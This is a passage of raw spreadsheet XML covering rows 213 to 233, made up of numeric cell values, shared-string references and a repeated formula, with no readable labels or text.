      <c r="Z213" s="38" t="s">
        <v>1738</v>
      </c>
      <c r="AA213" s="39" t="s">
        <v>1739</v>
      </c>
      <c r="AB213" s="38" t="s">
        <v>1740</v>
      </c>
      <c r="AC213" s="40">
        <v>38123.0</v>
      </c>
      <c r="AD213" s="5"/>
      <c r="AE213" s="14"/>
      <c r="AF213" s="14"/>
    </row>
    <row r="214">
      <c r="A214" s="6">
        <f t="shared" si="1"/>
        <v>0.1635565908</v>
      </c>
      <c r="B214" s="29">
        <v>1.0</v>
      </c>
      <c r="C214" s="29">
        <v>176562.0</v>
      </c>
      <c r="D214" s="14"/>
      <c r="E214" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F214" s="14"/>
      <c r="G214" s="29">
        <v>27.0</v>
      </c>
      <c r="H214" s="29">
        <v>6537.0</v>
      </c>
      <c r="I214" s="29">
        <v>167438.0</v>
      </c>
      <c r="J214" s="15"/>
      <c r="K214" s="29">
        <v>141087.0</v>
      </c>
      <c r="L214" s="15"/>
      <c r="M214" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N214" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O214" s="29">
        <v>3.0</v>
      </c>
      <c r="P214" s="29">
        <v>11.0</v>
      </c>
      <c r="Q214" s="15"/>
      <c r="R214" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S214" s="15"/>
      <c r="T214" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U214" s="5"/>
      <c r="V214" s="5"/>
      <c r="W214" s="47"/>
      <c r="X214" s="45"/>
      <c r="Y214" s="45"/>
      <c r="Z214" s="38" t="s">
        <v>1741</v>
      </c>
      <c r="AA214" s="39" t="s">
        <v>1742</v>
      </c>
      <c r="AB214" s="38" t="s">
        <v>1357</v>
      </c>
      <c r="AC214" s="40">
        <v>176559.0</v>
      </c>
      <c r="AD214" s="5"/>
      <c r="AE214" s="14"/>
      <c r="AF214" s="14"/>
    </row>
    <row r="215">
      <c r="A215" s="6">
        <f t="shared" si="1"/>
        <v>0.3700539776</v>
      </c>
      <c r="B215" s="29">
        <v>1.0</v>
      </c>
      <c r="C215" s="14"/>
      <c r="D215" s="14"/>
      <c r="E215" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F215" s="14"/>
      <c r="G215" s="29">
        <v>2.0</v>
      </c>
      <c r="H215" s="29">
        <v>2544.0</v>
      </c>
      <c r="I215" s="29">
        <v>34766.0</v>
      </c>
      <c r="J215" s="15"/>
      <c r="K215" s="29">
        <v>34766.0</v>
      </c>
      <c r="L215" s="15"/>
      <c r="M215" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N215" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O215" s="29">
        <v>1.0</v>
      </c>
      <c r="P215" s="29">
        <v>3.0</v>
      </c>
      <c r="Q215" s="15"/>
      <c r="R215" s="15"/>
      <c r="S215" s="15"/>
      <c r="T215" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U215" s="5"/>
      <c r="V215" s="5"/>
      <c r="W215" s="47"/>
      <c r="X215" s="45"/>
      <c r="Y215" s="45"/>
      <c r="Z215" s="38" t="s">
        <v>1743</v>
      </c>
      <c r="AA215" s="39" t="s">
        <v>1744</v>
      </c>
      <c r="AB215" s="38" t="s">
        <v>1745</v>
      </c>
      <c r="AC215" s="40">
        <v>216347.0</v>
      </c>
      <c r="AD215" s="5"/>
      <c r="AE215" s="14"/>
      <c r="AF215" s="14"/>
    </row>
    <row r="216">
      <c r="A216" s="6">
        <f t="shared" si="1"/>
        <v>0.5545379762</v>
      </c>
      <c r="B216" s="29">
        <v>1.0</v>
      </c>
      <c r="C216" s="15"/>
      <c r="D216" s="14"/>
      <c r="E216" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F216" s="14"/>
      <c r="G216" s="29">
        <v>11.0</v>
      </c>
      <c r="H216" s="29">
        <v>3032.0</v>
      </c>
      <c r="I216" s="29">
        <v>73406.0</v>
      </c>
      <c r="J216" s="15"/>
      <c r="K216" s="29">
        <v>73406.0</v>
      </c>
      <c r="L216" s="15"/>
      <c r="M216" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N216" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O216" s="29">
        <v>4.0</v>
      </c>
      <c r="P216" s="29">
        <v>0.0</v>
      </c>
      <c r="Q216" s="15"/>
      <c r="R216" s="15"/>
      <c r="S216" s="15"/>
      <c r="T216" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U216" s="5"/>
      <c r="V216" s="5"/>
      <c r="W216" s="47"/>
      <c r="X216" s="45"/>
      <c r="Y216" s="45"/>
      <c r="Z216" s="38" t="s">
        <v>1746</v>
      </c>
      <c r="AA216" s="39" t="s">
        <v>1747</v>
      </c>
      <c r="AB216" s="38" t="s">
        <v>1748</v>
      </c>
      <c r="AC216" s="40">
        <v>87062.0</v>
      </c>
      <c r="AD216" s="5"/>
      <c r="AE216" s="14"/>
      <c r="AF216" s="14"/>
    </row>
    <row r="217">
      <c r="A217" s="6">
        <f t="shared" si="1"/>
        <v>0.3995330677</v>
      </c>
      <c r="B217" s="29">
        <v>1.0</v>
      </c>
      <c r="C217" s="29">
        <v>40158.0</v>
      </c>
      <c r="D217" s="14"/>
      <c r="E217" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F217" s="14"/>
      <c r="G217" s="29">
        <v>0.0</v>
      </c>
      <c r="H217" s="29">
        <v>968.0</v>
      </c>
      <c r="I217" s="15"/>
      <c r="J217" s="5" t="s">
        <v>1749</v>
      </c>
      <c r="K217" s="29">
        <v>20074.0</v>
      </c>
      <c r="L217" s="15"/>
      <c r="M217" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N217" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O217" s="29">
        <v>2.0</v>
      </c>
      <c r="P217" s="29">
        <v>0.0</v>
      </c>
      <c r="Q217" s="15"/>
      <c r="R217" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S217" s="15"/>
      <c r="T217" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U217" s="5"/>
      <c r="V217" s="5"/>
      <c r="W217" s="47"/>
      <c r="X217" s="45"/>
      <c r="Y217" s="45"/>
      <c r="Z217" s="38" t="s">
        <v>1750</v>
      </c>
      <c r="AA217" s="39" t="s">
        <v>1751</v>
      </c>
      <c r="AB217" s="38" t="s">
        <v>1752</v>
      </c>
      <c r="AC217" s="40">
        <v>40154.0</v>
      </c>
      <c r="AD217" s="5"/>
      <c r="AE217" s="14"/>
      <c r="AF217" s="14"/>
    </row>
    <row r="218">
      <c r="A218" s="6">
        <f t="shared" si="1"/>
        <v>0.05645447788</v>
      </c>
      <c r="B218" s="29">
        <v>1.0</v>
      </c>
      <c r="C218" s="14"/>
      <c r="D218" s="14"/>
      <c r="E218" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F218" s="14"/>
      <c r="G218" s="29">
        <v>0.0</v>
      </c>
      <c r="H218" s="29">
        <v>150.0</v>
      </c>
      <c r="I218" s="29">
        <v>191641.0</v>
      </c>
      <c r="J218" s="15"/>
      <c r="K218" s="15"/>
      <c r="L218" s="15"/>
      <c r="M218" s="15"/>
      <c r="N218" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O218" s="29">
        <v>1.0</v>
      </c>
      <c r="P218" s="29">
        <v>1.0</v>
      </c>
      <c r="Q218" s="15"/>
      <c r="R218" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S218" s="15"/>
      <c r="T218" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U218" s="5"/>
      <c r="V218" s="5"/>
      <c r="W218" s="47"/>
      <c r="X218" s="45"/>
      <c r="Y218" s="45"/>
      <c r="Z218" s="38" t="s">
        <v>1753</v>
      </c>
      <c r="AA218" s="39" t="s">
        <v>1754</v>
      </c>
      <c r="AB218" s="38" t="s">
        <v>1755</v>
      </c>
      <c r="AC218" s="40">
        <v>197963.0</v>
      </c>
      <c r="AD218" s="5"/>
      <c r="AE218" s="14"/>
      <c r="AF218" s="14"/>
    </row>
    <row r="219">
      <c r="A219" s="6">
        <f t="shared" si="1"/>
        <v>0.04602620799</v>
      </c>
      <c r="B219" s="29">
        <v>1.0</v>
      </c>
      <c r="C219" s="14"/>
      <c r="D219" s="14"/>
      <c r="E219" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F219" s="14"/>
      <c r="G219" s="29">
        <v>2.0</v>
      </c>
      <c r="H219" s="29">
        <v>770.0</v>
      </c>
      <c r="I219" s="29">
        <v>145397.0</v>
      </c>
      <c r="J219" s="15"/>
      <c r="K219" s="29">
        <v>145397.0</v>
      </c>
      <c r="L219" s="15"/>
      <c r="M219" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N219" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O219" s="29">
        <v>1.0</v>
      </c>
      <c r="P219" s="29">
        <v>0.0</v>
      </c>
      <c r="Q219" s="15"/>
      <c r="R219" s="15"/>
      <c r="S219" s="15"/>
      <c r="T219" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U219" s="5"/>
      <c r="V219" s="5"/>
      <c r="W219" s="47"/>
      <c r="X219" s="45"/>
      <c r="Y219" s="45"/>
      <c r="Z219" s="38" t="s">
        <v>1756</v>
      </c>
      <c r="AA219" s="39" t="s">
        <v>1757</v>
      </c>
      <c r="AB219" s="38" t="s">
        <v>1758</v>
      </c>
      <c r="AC219" s="40">
        <v>162446.0</v>
      </c>
      <c r="AD219" s="5"/>
      <c r="AE219" s="14"/>
      <c r="AF219" s="14"/>
    </row>
    <row r="220">
      <c r="A220" s="6">
        <f t="shared" si="1"/>
        <v>0.06206268762</v>
      </c>
      <c r="B220" s="29">
        <v>1.0</v>
      </c>
      <c r="C220" s="15"/>
      <c r="D220" s="14"/>
      <c r="E220" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F220" s="14"/>
      <c r="G220" s="29">
        <v>1.0</v>
      </c>
      <c r="H220" s="29">
        <v>284.0</v>
      </c>
      <c r="I220" s="29">
        <v>251920.0</v>
      </c>
      <c r="J220" s="15"/>
      <c r="K220" s="15"/>
      <c r="L220" s="15"/>
      <c r="M220" s="15"/>
      <c r="N220" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O220" s="29">
        <v>0.0</v>
      </c>
      <c r="P220" s="29">
        <v>4.0</v>
      </c>
      <c r="Q220" s="15"/>
      <c r="R220" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S220" s="15"/>
      <c r="T220" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U220" s="5"/>
      <c r="V220" s="5"/>
      <c r="W220" s="47"/>
      <c r="X220" s="45"/>
      <c r="Y220" s="45"/>
      <c r="Z220" s="38" t="s">
        <v>1759</v>
      </c>
      <c r="AA220" s="39" t="s">
        <v>1760</v>
      </c>
      <c r="AB220" s="38" t="s">
        <v>1761</v>
      </c>
      <c r="AC220" s="40">
        <v>245455.0</v>
      </c>
      <c r="AD220" s="5"/>
      <c r="AE220" s="14"/>
      <c r="AF220" s="14"/>
    </row>
    <row r="221">
      <c r="A221" s="6">
        <f t="shared" si="1"/>
        <v>0.7790284514</v>
      </c>
      <c r="B221" s="29">
        <v>1.0</v>
      </c>
      <c r="C221" s="29">
        <v>116377.0</v>
      </c>
      <c r="D221" s="14"/>
      <c r="E221" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F221" s="14"/>
      <c r="G221" s="29">
        <v>1.0</v>
      </c>
      <c r="H221" s="29">
        <v>736.0</v>
      </c>
      <c r="I221" s="29">
        <v>102131.0</v>
      </c>
      <c r="J221" s="15"/>
      <c r="K221" s="15"/>
      <c r="L221" s="15"/>
      <c r="M221" s="15"/>
      <c r="N221" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O221" s="29">
        <v>1.0</v>
      </c>
      <c r="P221" s="29">
        <v>5.0</v>
      </c>
      <c r="Q221" s="15"/>
      <c r="R221" s="15"/>
      <c r="S221" s="15"/>
      <c r="T221" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U221" s="5"/>
      <c r="V221" s="5"/>
      <c r="W221" s="47"/>
      <c r="X221" s="45"/>
      <c r="Y221" s="45"/>
      <c r="Z221" s="38" t="s">
        <v>1762</v>
      </c>
      <c r="AA221" s="39" t="s">
        <v>1763</v>
      </c>
      <c r="AB221" s="38" t="s">
        <v>1764</v>
      </c>
      <c r="AC221" s="40">
        <v>116296.0</v>
      </c>
      <c r="AD221" s="5"/>
      <c r="AE221" s="14"/>
      <c r="AF221" s="14"/>
    </row>
    <row r="222">
      <c r="A222" s="6">
        <f t="shared" si="1"/>
        <v>0.2343161988</v>
      </c>
      <c r="B222" s="29">
        <v>1.0</v>
      </c>
      <c r="C222" s="29">
        <v>146005.0</v>
      </c>
      <c r="D222" s="14"/>
      <c r="E222" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F222" s="14"/>
      <c r="G222" s="29">
        <v>3.0</v>
      </c>
      <c r="H222" s="29">
        <v>959.0</v>
      </c>
      <c r="I222" s="29">
        <v>134093.0</v>
      </c>
      <c r="J222" s="15"/>
      <c r="K222" s="29">
        <v>98538.0</v>
      </c>
      <c r="L222" s="15"/>
      <c r="M222" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N222" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O222" s="29">
        <v>2.0</v>
      </c>
      <c r="P222" s="29">
        <v>0.0</v>
      </c>
      <c r="Q222" s="15"/>
      <c r="R222" s="15"/>
      <c r="S222" s="15"/>
      <c r="T222" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U222" s="5"/>
      <c r="V222" s="5"/>
      <c r="W222" s="47"/>
      <c r="X222" s="45"/>
      <c r="Y222" s="45"/>
      <c r="Z222" s="38" t="s">
        <v>1765</v>
      </c>
      <c r="AA222" s="39" t="s">
        <v>1766</v>
      </c>
      <c r="AB222" s="38" t="s">
        <v>1767</v>
      </c>
      <c r="AC222" s="40">
        <v>145999.0</v>
      </c>
      <c r="AD222" s="5"/>
      <c r="AE222" s="14"/>
      <c r="AF222" s="14"/>
    </row>
    <row r="223">
      <c r="A223" s="6">
        <f t="shared" si="1"/>
        <v>0.6482142651</v>
      </c>
      <c r="B223" s="29">
        <v>1.0</v>
      </c>
      <c r="C223" s="15"/>
      <c r="D223" s="14"/>
      <c r="E223" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F223" s="14"/>
      <c r="G223" s="29">
        <v>2.0</v>
      </c>
      <c r="H223" s="29">
        <v>106.0</v>
      </c>
      <c r="I223" s="29">
        <v>104866.0</v>
      </c>
      <c r="J223" s="15"/>
      <c r="K223" s="29">
        <v>104866.0</v>
      </c>
      <c r="L223" s="15"/>
      <c r="M223" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N223" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O223" s="29">
        <v>1.0</v>
      </c>
      <c r="P223" s="29">
        <v>0.0</v>
      </c>
      <c r="Q223" s="15"/>
      <c r="R223" s="15"/>
      <c r="S223" s="15"/>
      <c r="T223" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U223" s="5"/>
      <c r="V223" s="5"/>
      <c r="W223" s="47"/>
      <c r="X223" s="45"/>
      <c r="Y223" s="45"/>
      <c r="Z223" s="38" t="s">
        <v>1768</v>
      </c>
      <c r="AA223" s="39" t="s">
        <v>1769</v>
      </c>
      <c r="AB223" s="38" t="s">
        <v>1770</v>
      </c>
      <c r="AC223" s="40">
        <v>137282.0</v>
      </c>
      <c r="AD223" s="5"/>
      <c r="AE223" s="14"/>
      <c r="AF223" s="14"/>
    </row>
    <row r="224">
      <c r="A224" s="6">
        <f t="shared" si="1"/>
        <v>0.9029787326</v>
      </c>
      <c r="B224" s="29">
        <v>1.0</v>
      </c>
      <c r="C224" s="15"/>
      <c r="D224" s="14"/>
      <c r="E224" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F224" s="14"/>
      <c r="G224" s="29">
        <v>45.0</v>
      </c>
      <c r="H224" s="29">
        <v>34032.0</v>
      </c>
      <c r="I224" s="29">
        <v>203165.0</v>
      </c>
      <c r="J224" s="5" t="s">
        <v>1771</v>
      </c>
      <c r="K224" s="29">
        <v>203165.0</v>
      </c>
      <c r="L224" s="15"/>
      <c r="M224" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N224" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O224" s="29">
        <v>8.0</v>
      </c>
      <c r="P224" s="29">
        <v>11.0</v>
      </c>
      <c r="Q224" s="15"/>
      <c r="R224" s="15"/>
      <c r="S224" s="15"/>
      <c r="T224" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U224" s="5"/>
      <c r="V224" s="5"/>
      <c r="W224" s="47"/>
      <c r="X224" s="45"/>
      <c r="Y224" s="45"/>
      <c r="Z224" s="38" t="s">
        <v>1772</v>
      </c>
      <c r="AA224" s="39" t="s">
        <v>1773</v>
      </c>
      <c r="AB224" s="38" t="s">
        <v>1774</v>
      </c>
      <c r="AC224" s="40">
        <v>206364.0</v>
      </c>
      <c r="AD224" s="5"/>
      <c r="AE224" s="14"/>
      <c r="AF224" s="14"/>
    </row>
    <row r="225">
      <c r="A225" s="6">
        <f t="shared" si="1"/>
        <v>0.9978206593</v>
      </c>
      <c r="B225" s="29">
        <v>1.0</v>
      </c>
      <c r="C225" s="29">
        <v>127157.0</v>
      </c>
      <c r="D225" s="14"/>
      <c r="E225" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F225" s="14"/>
      <c r="G225" s="29">
        <v>6.0</v>
      </c>
      <c r="H225" s="29">
        <v>2192.0</v>
      </c>
      <c r="I225" s="29">
        <v>81923.0</v>
      </c>
      <c r="J225" s="15"/>
      <c r="K225" s="29">
        <v>72031.0</v>
      </c>
      <c r="L225" s="15"/>
      <c r="M225" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N225" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O225" s="29">
        <v>2.0</v>
      </c>
      <c r="P225" s="29">
        <v>0.0</v>
      </c>
      <c r="Q225" s="15"/>
      <c r="R225" s="15"/>
      <c r="S225" s="15"/>
      <c r="T225" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U225" s="5"/>
      <c r="V225" s="5"/>
      <c r="W225" s="47"/>
      <c r="X225" s="45"/>
      <c r="Y225" s="45"/>
      <c r="Z225" s="38" t="s">
        <v>1775</v>
      </c>
      <c r="AA225" s="39" t="s">
        <v>1776</v>
      </c>
      <c r="AB225" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC225" s="40">
        <v>127154.0</v>
      </c>
      <c r="AD225" s="5"/>
      <c r="AE225" s="14"/>
      <c r="AF225" s="14"/>
    </row>
    <row r="226">
      <c r="A226" s="6">
        <f t="shared" si="1"/>
        <v>0.6202252575</v>
      </c>
      <c r="B226" s="29">
        <v>1.0</v>
      </c>
      <c r="C226" s="15"/>
      <c r="D226" s="14"/>
      <c r="E226" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F226" s="14"/>
      <c r="G226" s="29">
        <v>0.0</v>
      </c>
      <c r="H226" s="29">
        <v>91.0</v>
      </c>
      <c r="I226" s="29">
        <v>244914.0</v>
      </c>
      <c r="J226" s="15"/>
      <c r="K226" s="29">
        <v>244914.0</v>
      </c>
      <c r="L226" s="15"/>
      <c r="M226" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N226" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O226" s="29">
        <v>1.0</v>
      </c>
      <c r="P226" s="29">
        <v>5.0</v>
      </c>
      <c r="Q226" s="15"/>
      <c r="R226" s="15"/>
      <c r="S226" s="15"/>
      <c r="T226" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U226" s="5"/>
      <c r="V226" s="5"/>
      <c r="W226" s="47"/>
      <c r="X226" s="45"/>
      <c r="Y226" s="45"/>
      <c r="Z226" s="38" t="s">
        <v>1778</v>
      </c>
      <c r="AA226" s="39" t="s">
        <v>1779</v>
      </c>
      <c r="AB226" s="38" t="s">
        <v>1780</v>
      </c>
      <c r="AC226" s="40">
        <v>263466.0</v>
      </c>
      <c r="AD226" s="5"/>
      <c r="AE226" s="14"/>
      <c r="AF226" s="14"/>
    </row>
    <row r="227">
      <c r="A227" s="6">
        <f t="shared" si="1"/>
        <v>0.2275195359</v>
      </c>
      <c r="B227" s="29">
        <v>1.0</v>
      </c>
      <c r="C227" s="15"/>
      <c r="D227" s="14"/>
      <c r="E227" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F227" s="14"/>
      <c r="G227" s="29">
        <v>1.0</v>
      </c>
      <c r="H227" s="29">
        <v>268.0</v>
      </c>
      <c r="I227" s="29">
        <v>140022.0</v>
      </c>
      <c r="J227" s="15"/>
      <c r="K227" s="29">
        <v>86741.0</v>
      </c>
      <c r="L227" s="15"/>
      <c r="M227" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N227" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O227" s="29">
        <v>0.0</v>
      </c>
      <c r="P227" s="29">
        <v>2.0</v>
      </c>
      <c r="Q227" s="15"/>
      <c r="R227" s="15"/>
      <c r="S227" s="15"/>
      <c r="T227" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U227" s="5"/>
      <c r="V227" s="5"/>
      <c r="W227" s="47"/>
      <c r="X227" s="45"/>
      <c r="Y227" s="45"/>
      <c r="Z227" s="38" t="s">
        <v>1781</v>
      </c>
      <c r="AA227" s="39" t="s">
        <v>1782</v>
      </c>
      <c r="AB227" s="38" t="s">
        <v>1783</v>
      </c>
      <c r="AC227" s="40">
        <v>178210.0</v>
      </c>
      <c r="AD227" s="5"/>
      <c r="AE227" s="14"/>
      <c r="AF227" s="14"/>
    </row>
    <row r="228">
      <c r="A228" s="6">
        <f t="shared" si="1"/>
        <v>0.7038540539</v>
      </c>
      <c r="B228" s="29">
        <v>1.0</v>
      </c>
      <c r="C228" s="29">
        <v>203729.0</v>
      </c>
      <c r="D228" s="14"/>
      <c r="E228" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F228" s="14"/>
      <c r="G228" s="29">
        <v>2.0</v>
      </c>
      <c r="H228" s="29">
        <v>302.0</v>
      </c>
      <c r="I228" s="29">
        <v>168506.0</v>
      </c>
      <c r="J228" s="15"/>
      <c r="K228" s="15"/>
      <c r="L228" s="15"/>
      <c r="M228" s="14"/>
      <c r="N228" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O228" s="29">
        <v>1.0</v>
      </c>
      <c r="P228" s="29">
        <v>2.0</v>
      </c>
      <c r="Q228" s="15"/>
      <c r="R228" s="15"/>
      <c r="S228" s="15"/>
      <c r="T228" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U228" s="5"/>
      <c r="V228" s="5"/>
      <c r="W228" s="47"/>
      <c r="X228" s="45"/>
      <c r="Y228" s="45"/>
      <c r="Z228" s="38" t="s">
        <v>1784</v>
      </c>
      <c r="AA228" s="39" t="s">
        <v>1785</v>
      </c>
      <c r="AB228" s="38" t="s">
        <v>1319</v>
      </c>
      <c r="AC228" s="40">
        <v>203699.0</v>
      </c>
      <c r="AD228" s="5"/>
      <c r="AE228" s="14"/>
      <c r="AF228" s="14"/>
    </row>
    <row r="229">
      <c r="A229" s="6">
        <f t="shared" si="1"/>
        <v>0.3802246738</v>
      </c>
      <c r="B229" s="29">
        <v>1.0</v>
      </c>
      <c r="C229" s="15"/>
      <c r="D229" s="14"/>
      <c r="E229" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F229" s="14"/>
      <c r="G229" s="29">
        <v>0.0</v>
      </c>
      <c r="H229" s="29">
        <v>31.0</v>
      </c>
      <c r="I229" s="29">
        <v>255510.0</v>
      </c>
      <c r="J229" s="15"/>
      <c r="K229" s="29">
        <v>6253.0</v>
      </c>
      <c r="L229" s="15"/>
      <c r="M229" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N229" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O229" s="29">
        <v>0.0</v>
      </c>
      <c r="P229" s="29">
        <v>0.0</v>
      </c>
      <c r="Q229" s="15"/>
      <c r="R229" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S229" s="15"/>
      <c r="T229" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U229" s="5"/>
      <c r="V229" s="5"/>
      <c r="W229" s="47"/>
      <c r="X229" s="45"/>
      <c r="Y229" s="45"/>
      <c r="Z229" s="38" t="s">
        <v>1786</v>
      </c>
      <c r="AA229" s="39" t="s">
        <v>1787</v>
      </c>
      <c r="AB229" s="38" t="s">
        <v>1788</v>
      </c>
      <c r="AC229" s="40">
        <v>267657.0</v>
      </c>
      <c r="AD229" s="5"/>
      <c r="AE229" s="14"/>
      <c r="AF229" s="14"/>
    </row>
    <row r="230">
      <c r="A230" s="6">
        <f t="shared" si="1"/>
        <v>0.1549335177</v>
      </c>
      <c r="B230" s="29">
        <v>1.0</v>
      </c>
      <c r="C230" s="29">
        <v>26463.0</v>
      </c>
      <c r="D230" s="14"/>
      <c r="E230" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F230" s="14"/>
      <c r="G230" s="29">
        <v>4.0</v>
      </c>
      <c r="H230" s="29">
        <v>991.0</v>
      </c>
      <c r="I230" s="29">
        <v>12776.0</v>
      </c>
      <c r="J230" s="15"/>
      <c r="K230" s="15"/>
      <c r="L230" s="15"/>
      <c r="M230" s="14"/>
      <c r="N230" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O230" s="29">
        <v>2.0</v>
      </c>
      <c r="P230" s="29">
        <v>1.0</v>
      </c>
      <c r="Q230" s="15"/>
      <c r="R230" s="15"/>
      <c r="S230" s="15"/>
      <c r="T230" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U230" s="5"/>
      <c r="V230" s="5"/>
      <c r="W230" s="47"/>
      <c r="X230" s="45"/>
      <c r="Y230" s="45"/>
      <c r="Z230" s="38" t="s">
        <v>1789</v>
      </c>
      <c r="AA230" s="39" t="s">
        <v>1790</v>
      </c>
      <c r="AB230" s="38" t="s">
        <v>1791</v>
      </c>
      <c r="AC230" s="40">
        <v>26460.0</v>
      </c>
      <c r="AD230" s="5"/>
      <c r="AE230" s="14"/>
      <c r="AF230" s="14"/>
    </row>
    <row r="231">
      <c r="A231" s="6">
        <f t="shared" si="1"/>
        <v>0.9425069966</v>
      </c>
      <c r="B231" s="29">
        <v>1.0</v>
      </c>
      <c r="C231" s="15"/>
      <c r="D231" s="14"/>
      <c r="E231" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F231" s="14"/>
      <c r="G231" s="29">
        <v>5.0</v>
      </c>
      <c r="H231" s="29">
        <v>48559.0</v>
      </c>
      <c r="I231" s="29">
        <v>148862.0</v>
      </c>
      <c r="J231" s="15"/>
      <c r="K231" s="29">
        <v>9792.0</v>
      </c>
      <c r="L231" s="15"/>
      <c r="M231" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N231" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O231" s="29">
        <v>1.0</v>
      </c>
      <c r="P231" s="29">
        <v>6.0</v>
      </c>
      <c r="Q231" s="15"/>
      <c r="R231" s="15"/>
      <c r="S231" s="15"/>
      <c r="T231" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U231" s="5"/>
      <c r="V231" s="5"/>
      <c r="W231" s="47"/>
      <c r="X231" s="45"/>
      <c r="Y231" s="45"/>
      <c r="Z231" s="38" t="s">
        <v>1792</v>
      </c>
      <c r="AA231" s="39" t="s">
        <v>1793</v>
      </c>
      <c r="AB231" s="38" t="s">
        <v>1794</v>
      </c>
      <c r="AC231" s="40">
        <v>181222.0</v>
      </c>
      <c r="AD231" s="5"/>
      <c r="AE231" s="14"/>
      <c r="AF231" s="14"/>
    </row>
    <row r="232">
      <c r="A232" s="6">
        <f t="shared" si="1"/>
        <v>0.2704580255</v>
      </c>
      <c r="B232" s="29">
        <v>1.0</v>
      </c>
      <c r="C232" s="15"/>
      <c r="D232" s="14"/>
      <c r="E232" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F232" s="14"/>
      <c r="G232" s="29">
        <v>2.0</v>
      </c>
      <c r="H232" s="29">
        <v>337.0</v>
      </c>
      <c r="I232" s="29">
        <v>50450.0</v>
      </c>
      <c r="J232" s="15"/>
      <c r="K232" s="29">
        <v>50450.0</v>
      </c>
      <c r="L232" s="15"/>
      <c r="M232" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N232" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O232" s="29">
        <v>2.0</v>
      </c>
      <c r="P232" s="29">
        <v>0.0</v>
      </c>
      <c r="Q232" s="15"/>
      <c r="R232" s="15"/>
      <c r="S232" s="15"/>
      <c r="T232" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U232" s="5"/>
      <c r="V232" s="5"/>
      <c r="W232" s="47"/>
      <c r="X232" s="45"/>
      <c r="Y232" s="45"/>
      <c r="Z232" s="38" t="s">
        <v>1795</v>
      </c>
      <c r="AA232" s="39" t="s">
        <v>1796</v>
      </c>
      <c r="AB232" s="38" t="s">
        <v>1797</v>
      </c>
      <c r="AC232" s="40">
        <v>62520.0</v>
      </c>
      <c r="AD232" s="5"/>
      <c r="AE232" s="14"/>
      <c r="AF232" s="14"/>
    </row>
    <row r="233">
      <c r="A233" s="6">
        <f t="shared" si="1"/>
        <v>0.6874486576</v>
      </c>
      <c r="B233" s="29">
        <v>1.0</v>
      </c>
      <c r="C233" s="15"/>
      <c r="D233" s="14"/>
      <c r="E233" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F233" s="14"/>
      <c r="G233" s="29">
        <v>1.0</v>
      </c>
      <c r="H233" s="29">
        <v>53.0</v>
      </c>
      <c r="I233" s="29">
        <v>275900.0</v>
